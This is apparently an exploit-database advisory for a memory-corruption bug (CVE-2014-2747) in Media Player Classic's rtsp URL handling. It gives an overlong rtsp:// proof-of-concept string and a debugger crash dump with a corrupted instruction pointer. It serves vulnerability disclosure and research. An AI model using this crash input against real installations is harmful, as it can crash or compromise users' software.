|
# Exploit Title: [Media Player Classic Memory Corruption]
# Date: [2014/04/13]
# Exploit Author: [Aryan Bayaninejad]
# Linkedin : https://www.linkedin.com/profile/view?id=276969082
# Vendor Homepage: [http://mpc-hc.org/]
# Software Link: [
http://sourceforge.net/projects/mpc-hc/files/MPC%20HomeCinema%20-%20Win32/MPC-HC%20v1.3.1249.0_32%20bits/
]
# Version: [Version 1.3.1752.0 and 1.3.1249.0]
# Tested on: [Windows Xp Sp 3 Version 2002]
# CVE : [CVE-2014-2747]
details:
The root cause of the vulnerability is related to handling the rtsp
protocol in open file, when opening a file in media player classic, it's
not able to parse the rtsp protocol with long strings correctly & caused a
memory corruption vulnerability, this is due to the wrong parsing of rtsp
protocol in OpenFile menu .
rtsp://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Log data, item 0
Address=FEEEFEEE
Message=Access violation when executing [FEEEFEEE]
EAX 01EA5730
ECX 02E21840
EDX FEEEFEEE
EBX 00000000
ESP 0012F6CC
EBP FFFFFFFF
ESI 012124E0
EDI 00000000
EIP FEEEFEEE
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDF000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty -2.8591239712727915520e+4908
ST1 empty -UNORM F700 0000002C 84F12DA8
ST2 empty 0.0194887299572376640e-4933
ST3 empty 1.5530773741217080320e-4124
ST4 empty +UNORM 6E64 00000000 B9EFA280
ST5 empty 1.0000000000000000000
ST6 empty 8000000.0000000000000
ST7 empty 0.0
3 2 1 0 E S P U O Z D I
FST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)
FCW 007F Prec NEAR,24 Mask 1 1 1 1 1 1
0012D58A 00410041 mpc-hc.00410041
0012D58E 00410041 mpc-hc.00410041
0012D592 00410041 mpc-hc.00410041
0012D596 00410041 mpc-hc.00410041
0012D59A 00410041 mpc-hc.00410041
0012D59E 00410041 mpc-hc.00410041
0012D5A2 00410041 mpc-hc.00410041
0012D5A6 00410041 mpc-hc.00410041
0012D5AA 00410041 mpc-hc.00410041
0012D5AE 00410041 mpc-hc.00410041
0012D5B2 00410041 mpc-hc.00410041
0012D5B6 00410041 mpc-hc.00410041
0012D5BA 00410041 mpc-hc.00410041
0012D5BE 00410041 mpc-hc.00410041
0012D5C2 00410041 mpc-hc.00410041
0012D5C6 00410041 mpc-hc.00410041
0012D5CA 00410041 mpc-hc.00410041
0012D5CE 00410041 mpc-hc.00410041
0012D5D2 00410041 mpc-hc.00410041
0012D5D6 00410041 mpc-hc.00410041
0012D5DA 00410041 mpc-hc.00410041
0012D5DE 00410041 mpc-hc.00410041
0012D5E2 00410041 mpc-hc.00410041
0012D5E6 00410041 mpc-hc.00410041
0012D5EA 00410041 mpc-hc.00410041
0012D5EE 00410041 mpc-hc.00410041
0012D5F2 00410041 mpc-hc.00410041
0012D5F6 00410041 mpc-hc.00410041
0012D5FA 00410041 mpc-hc.00410041
|